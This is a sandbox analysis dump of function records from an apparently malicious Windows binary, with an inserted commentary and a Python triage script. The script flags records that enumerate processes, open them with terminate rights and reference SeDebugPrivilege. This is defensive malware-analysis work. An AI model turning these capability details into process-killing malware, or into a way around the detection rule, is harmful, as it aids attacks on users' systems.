                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0007853C,00000B00,?,?), ref: 00078946
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0007853C,00000B00,?,?), ref: 0007894E
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,0007853C,00000B00,?,?), ref: 00078951
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0007853C,00000B00,?,?), ref: 00078961
                                                                                                                      • GetCurrentProcess.KERNEL32(0007853C,00000000,?,0007853C,00000B00,?,?), ref: 00078969
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,0007853C,00000B00,?,?), ref: 0007896C
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00078992,00000000,00000000,00000000), ref: 00078986
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1957940570-0
                                                                                                                      • Opcode ID: dd237f7d9486022cf79dbbcaaa48ac265bee08d045e71797477bf0fdf32329ec
                                                                                                                      • Instruction ID: 730c11b1066bdb808c4cd8558e9967651656bef62f5285e6d3676d2dc35ba248
                                                                                                                      • Instruction Fuzzy Hash: 0201BBB5640709FFF760ABA5DC4DF6B3BACEB89711F418421FA05DB1A1DA749800CB20
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                      • API String ID: 0-572801152
                                                                                                                      • Opcode ID: 52f32e34418cdf526b21e968a8c9a3d2c1978274fb5b70c243d326efe2540a37
                                                                                                                      • Instruction ID: 17408e2500b340b0b72ecb7b5de4b32673ab0f5b25a8d93c43c567a1b8cbde91
                                                                                                                      • Instruction Fuzzy Hash: 2FC19071A0020A9FDF10DFA8D884AEEB7F5FF48314F14846DE905AB281E771AD41DBA0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$_memset
                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                      • API String ID: 2862541840-625585964
                                                                                                                      • Opcode ID: 89f509c4aa6f43cd64b33d9c51d50c119a21037dd5e1ecb91898b8b640076fdd
                                                                                                                      • Instruction ID: 1ef7720eca2e0e9e692128fff35127472ed73948d1840a24555baa7060c4ab55
                                                                                                                      • Instruction Fuzzy Hash: B2919D71A00219EBDF24DFA9C848FAEBBB8EF45710F10815EF515AB281D7709A45DFA0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0007710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?,?,00077455), ref: 00077127
                                                                                                                        • Part of subcall function 0007710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?), ref: 00077142
                                                                                                                        • Part of subcall function 0007710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?), ref: 00077150
                                                                                                                        • Part of subcall function 0007710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?), ref: 00077160
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00099806
                                                                                                                      • _memset.LIBCMT ref: 00099813
                                                                                                                      • _memset.LIBCMT ref: 00099956
                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00099982
                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0009998D
                                                                                                                      Strings
                                                                                                                      • NULL Pointer assignment, xrefs: 000999DB
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                      • API String ID: 1300414916-2785691316
                                                                                                                      • Opcode ID: da7be3fb0b1be9b05681afc052c92575cc3f71a1a29c9aa29c00d45af1e41009
                                                                                                                      • Instruction ID: 0e79847c5898832bdce1128552f22060baec36a37892c536a4113d439dc4b1b6
                                                                                                                      • Instruction Fuzzy Hash: F7911671D00229ABDF10DFA5DC85ADEBBB9AF09310F20415AF519A7291DB719A44CFA0
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 000A6E24
                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 000A6E38
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 000A6E52
                                                                                                                      • _wcscat.LIBCMT ref: 000A6EAD
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 000A6EC4
                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 000A6EF2
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                      • String ID: SysListView32
                                                                                                                      • API String ID: 307300125-78025650
                                                                                                                      • Opcode ID: 8cb44e2ef5c4b143d2105d2837b6ede62cd6cedcdd72a740f9457d9e05463c0a
                                                                                                                      • Instruction ID: 81f19a366fb6563c508274f5ffa138adc06275f0e3263aba8bdf6e4d1c69daa7
                                                                                                                      • Opcode Fuzzy Hash: 8cb44e2ef5c4b143d2105d2837b6ede62cd6cedcdd72a740f9457d9e05463c0a
                                                                                                                      • Instruction Fuzzy Hash: 38418F70A00349EBEB21DFA4CC85BEA77F8EF09350F14052AF585E7292D6769D848B60
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00083C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00083C7A
                                                                                                                        • Part of subcall function 00083C55: Process32FirstW.KERNEL32(00000000,?), ref: 00083C88
                                                                                                                        • Part of subcall function 00083C55: CloseHandle.KERNEL32(00000000), ref: 00083D52
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0009E9A4
                                                                                                                      • GetLastError.KERNEL32 ref: 0009E9B7
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0009E9E6
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0009EA63
                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 0009EA6E
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0009EAA3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                      • Opcode ID: dd4a54e378fefa6172643f6bd3f9e6001ea287c20da64052011421a188e3cd23
                                                                                                                      • Instruction ID: 549f59d30bce4e4ca6893f37569b7aed3daf6f3acf74e99866677f7facc5a369
                                                                                                                      • Opcode Fuzzy Hash: dd4a54e378fefa6172643f6bd3f9e6001ea287c20da64052011421a188e3cd23
                                                                                                                      • Instruction Fuzzy Hash: 5841B9716006019FDB24EF64CCA5FAEB7A5BF40310F088459F9469B2D3CB79AD04DB96
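The record above is the one worth pausing on: a subcall walks the process list with CreateToolhelp32Snapshot/Process32FirstW, the function then calls OpenProcess with desired access 0x00000001 (PROCESS_TERMINATE, and nothing else), calls TerminateProcess, and sits next to the string SeDebugPrivilege, which is what lets the handle open succeed against processes owned by SYSTEM or another user. In a compiled AutoIt binary this is most likely the runtime's own ProcessClose() routine, so the question for an analyst is which process names the script feeds into it, not the routine itself. The script below is an added example, not code from Joe Sandbox or from this report: it parses the function-record format printed on this page (the "APIs", "String ID" and "Opcode ID" lines) and flags records that carry this process-kill combination. The sample input is constructed from two records above, trimmed to the lines the parser reads; the rule names and the PROCESS_TERMINATE constant are mine.

```python
"""Triage helper for Joe Sandbox function records (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field

# Constructed sample: two records from the report above, trimmed to the lines
# the parser uses. Addresses, IDs and hashes are copied from those records.
SAMPLE_RECORDS = """\
APIs
  • Part of subcall function 00083C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00083C7A
  • Part of subcall function 00083C55: Process32FirstW.KERNEL32(00000000,?), ref: 00083C88
  • Part of subcall function 00083C55: CloseHandle.KERNEL32(00000000), ref: 00083D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0009E9A4
• GetLastError.KERNEL32 ref: 0009E9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0009E9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0009EA63
• GetLastError.KERNEL32(00000000), ref: 0009EA6E
• CloseHandle.KERNEL32(00000000), ref: 0009EAA3
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: dd4a54e378fefa6172643f6bd3f9e6001ea287c20da64052011421a188e3cd23
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00083033
Strings
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: 1eca1526fa388268ab0320ca196182ec1f6d8030f54931aa1608b3b590778554
"""

# One API line: optional "Part of subcall function XXXX:" prefix, Name.MODULE,
# optional "(arg,arg,...)", then "ref: address".
API_LINE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
STRING_ID = re.compile(r"•\s*String ID:\s*(?P<ids>.*)")   # does not match "API String ID"
OPCODE_ID = re.compile(r"•\s*Opcode ID:\s*(?P<id>[0-9a-f]+)")

PROCESS_TERMINATE = 0x0001  # Win32 desired-access bit for OpenProcess


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    via_subcall: bool  # attributed to a callee, not the function itself


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)

    def api_names(self):
        return {c.api for c in self.calls}


def parse_records(text):
    """Split the report text into records; each record starts at a bare 'APIs' line."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.search(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            current.calls.append(Call(m.group("api"), m.group("mod"), args,
                                      m.group("ref"), bool(m.group("sub"))))
            continue
        m = STRING_ID.search(line)
        if m:
            current.strings = [s for s in m.group("ids").split("$") if s]
            continue
        m = OPCODE_ID.search(line)
        if m:
            current.opcode_id = m.group("id")
    return records


def triage(rec):
    """Return human-readable findings for the process-kill pattern (rule names are mine)."""
    findings = []
    apis = rec.api_names()
    enumerates = bool(apis & {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"})
    terminates = "TerminateProcess" in apis
    if enumerates and terminates:
        findings.append("enumerates running processes and calls TerminateProcess (process-kill capability)")
    for c in rec.calls:
        # First OpenProcess argument is dwDesiredAccess; '?' means the value was not recovered.
        if c.api == "OpenProcess" and c.args and c.args[0] != "?":
            access = int(c.args[0], 16)
            if access & PROCESS_TERMINATE:
                findings.append(f"OpenProcess at {c.ref} requests PROCESS_TERMINATE (0x{access:08X})")
    if "SeDebugPrivilege" in rec.strings and (terminates or "OpenProcess" in apis):
        findings.append("references SeDebugPrivilege beside process-handle APIs (reaches SYSTEM/other-user processes)")
    return findings


def summarize(text):
    """Map Opcode ID -> findings for every record that triggers at least one rule."""
    return {r.opcode_id: f for r in parse_records(text) if (f := triage(r))}


if __name__ == "__main__":
    for opcode_id, findings in summarize(SAMPLE_RECORDS).items():
        print(opcode_id)
        for f in findings:
            print("  -", f)
```

Run it against the full report text instead of the embedded sample and the Opcode IDs it prints are the functions to open first in the disassembly; the LoadIconW record is parsed too but triggers nothing, which is the point of keying on the combination rather than on any single API.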
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00083033
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoad
                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                      • Opcode ID: 1eca1526fa388268ab0320ca196182ec1f6d8030f54931aa1608b3b590778554
                                                                                                                      • Instruction ID: 8cd9c7c7180a77d92423e011d03ace5694e94805e6979c731571479534277786
                                                                                                                      • Opcode Fuzzy Hash: 1eca1526fa388268ab0320ca196182ec1f6d8030f54931aa1608b3b590778554
                                                                                                                      • Instruction Fuzzy Hash: 63112B31348746BEE724AA55DC52CAF77DCAF15720B10403AFA40AA282DB709F405FA4
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00084312
                                                                                                                      • LoadStringW.USER32(00000000), ref: 00084319
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0008432F
                                                                                                                      • LoadStringW.USER32(00000000), ref: 00084336
                                                                                                                      • _wprintf.LIBCMT ref: 0008435C
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0008437A
                                                                                                                      Strings
                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00084357
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                      • API String ID: 3648134473-3128320259
                                                                                                                      • Opcode ID: 6490ae14f21bc5201927068ba6f103c8b50e0515805bbfd0337bb39318018b2b
                                                                                                                      • Instruction ID: afa961f20ded453dbc4f53df256c8678bc6167a91533c93d92ea5fe9d1326622
                                                                                                                      • Opcode Fuzzy Hash: 6490ae14f21bc5201927068ba6f103c8b50e0515805bbfd0337bb39318018b2b
                                                                                                                      • Instruction Fuzzy Hash: 160162F2940209BFE761A7E0DD89EFB776CEB09300F0045B1B745E6051EA785E854B74
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 000AD47C
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 000AD49C
                                                                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 000AD6D7
                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 000AD6F5
                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 000AD716
                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 000AD735
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 000AD75A
                                                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 000AD77D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1211466189-0
                                                                                                                      • Opcode ID: 779e9f7c7123b6787837a4e635eee079599a4bad6e18cc63dd1e8b485a7be92b
                                                                                                                      • Instruction ID: c97f2d38435c7a247e1fbecb92723b3ea5ec6f23879862c7699e1c5dc9d35dc6
                                                                                                                      • Opcode Fuzzy Hash: 779e9f7c7123b6787837a4e635eee079599a4bad6e18cc63dd1e8b485a7be92b
                                                                                                                      • Instruction Fuzzy Hash: 1AB18B75600615EBDF18CFA8C9C57AD7BF1BF09701F08806AEC4AAF695E734A950CB90
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0005C1C7,00000004,00000000,00000000,00000000), ref: 00022ACF
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0005C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00022B17
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0005C1C7,00000004,00000000,00000000,00000000), ref: 0005C21A
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0005C1C7,00000004,00000000,00000000,00000000), ref: 0005C286
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ShowWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1268545403-0
                                                                                                                      • Opcode ID: ac072efcec7f207168719e1d960e1e0d01a18b11e70b020b4ba2fffb0eb9ad86
                                                                                                                      • Instruction ID: 088ff4bdc606fcf2f8e3d35e5e5b4d4a204b9cef195a731b968adc3128d5c34a
                                                                                                                      • Opcode Fuzzy Hash: ac072efcec7f207168719e1d960e1e0d01a18b11e70b020b4ba2fffb0eb9ad86
                                                                                                                      • Instruction Fuzzy Hash: 93413B30608B90BFE7758BA8EC8CB7F7BD2AB46301F15882DE44796961CA359885D712
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 000870DD
                                                                                                                        • Part of subcall function 00040DB6: std::exception::exception.LIBCMT ref: 00040DEC
                                                                                                                        • Part of subcall function 00040DB6: __CxxThrowException@8.LIBCMT ref: 00040E01
                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00087114
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00087130
                                                                                                                      • _memmove.LIBCMT ref: 0008717E
                                                                                                                      • _memmove.LIBCMT ref: 0008719B
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 000871AA
                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 000871BF
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 000871DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 256516436-0
                                                                                                                      • Opcode ID: 8345cf460b6cb101455f2e0fc33ed7e3bacd1c838de952e0cbddd1e649333ee1
                                                                                                                      • Instruction ID: 2321566f9523c6fab6136cbac3c51265e16682a254cb0a811ae0a2f7c0d39315
• Opcode Fuzzy Hash: 8345cf460b6cb101455f2e0fc33ed7e3bacd1c838de952e0cbddd1e649333ee1
• Instruction Fuzzy Hash: 5B316E71900205EBDF10EFA5DC89AAAB7B8FF45710F1441B5ED04AB246DB34EA14CB64
APIs
• DeleteObject.GDI32(00000000), ref: 000A61EB
• GetDC.USER32(00000000), ref: 000A61F3
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 000A61FE
• ReleaseDC.USER32(00000000,00000000), ref: 000A620A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 000A6246
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000A6257
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000A902A,?,?,000000FF,00000000,?,000000FF,?), ref: 000A6291
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000A62B1
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: c0a20ed4cdb3f2a05824a9b420c6fce611fb2a6bc0338f4de6f34b11cfb01bf2
• Instruction ID: 3e96987a74fe35a0ff786fef2555c24180a90454531df049d1810069c54f9352
• Opcode Fuzzy Hash: c0a20ed4cdb3f2a05824a9b420c6fce611fb2a6bc0338f4de6f34b11cfb01bf2
• Instruction Fuzzy Hash: 02314F72101614BFEB118F90CC8AFFB3FA9EF4A765F084065FE089A192C6799C41CB64
APIs
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: 3ca567e81c5951c650a5dfef1e70c55f489cb081191fc28a2026c6283c05cc9b
• Instruction ID: 78eb77de32a3f2a9f8c52cf02eca5157e392acce9fbca3221a5c8139b46d76b7
• Opcode Fuzzy Hash: 3ca567e81c5951c650a5dfef1e70c55f489cb081191fc28a2026c6283c05cc9b
• Instruction Fuzzy Hash: D321A1B1B012097BA6157611DD52FFF779DAF50348F08C020FE0C9A647EBA8EE1582AD
APIs
  • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
  • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
  • Part of subcall function 0003FC86: _wcscpy.LIBCMT ref: 0003FCA9
• _wcstok.LIBCMT ref: 0008EC94
• _wcscpy.LIBCMT ref: 0008ED23
• _memset.LIBCMT ref: 0008ED56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: b68ed76153d1a1f1a74c448c8286e4bb725cef316e848921fe645076e602f032
• Instruction ID: 4c511d1d1b7efdd08cb19e5e20ec5e6383781f2401df4f3df6e2edfca0072d7a
• Opcode Fuzzy Hash: b68ed76153d1a1f1a74c448c8286e4bb725cef316e848921fe645076e602f032
• Instruction Fuzzy Hash: EFC19D716087519FC764EF24D885AAAB7E4FF85310F00492DF9999B2A3DB30EC45CB86
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 05336994b49305195f5c995bd4120d1437e5fd69ece442e6b226181754bddfc7
• Instruction ID: 2d8c2c77c00219f605f5e18a1ad31dc04c1e2b29ff39518a150689035c7a22b2
• Opcode Fuzzy Hash: 05336994b49305195f5c995bd4120d1437e5fd69ece442e6b226181754bddfc7
• Instruction Fuzzy Hash: A7717A30900519EFDB14DF98DC48AFFBBB9FF99314F108159F915AA251C734AA51CBA0
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
